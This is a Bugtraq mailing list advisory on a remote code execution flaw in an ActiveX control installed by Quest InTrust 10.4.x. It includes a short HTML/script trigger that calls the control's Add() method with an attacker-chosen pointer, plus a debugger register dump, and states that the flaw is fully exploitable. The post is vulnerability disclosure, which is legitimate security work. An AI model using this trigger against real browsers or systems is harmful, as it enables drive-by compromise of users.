Home page logo
/

bugtraq logo Bugtraq mailing list archives

Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
From: nospam () gmail it
Date: Wed, 28 Mar 2012 17:30:06 GMT

Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution 


homepage: http://www.quest.com/intrust/

description: "InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices."


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip


Background:

The mentioned product installs an ActiveX control
with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so 
Internet Explorer will allow scripting of this control
from remote.

Vulnerability:

By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

..
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] 
ds:0023:1ddc2428=????????
..

You are in control of eax: fully exploitable.
As attachment, proof of concept code. 

original url: http://retrogod.altervista.org/9sg_quest_adv.htm

poc: http://retrogod.altervista.org/9sg_quest_poc.htm


  By Date           By Thread  

Current thread:
  • Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution nospam (Mar 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault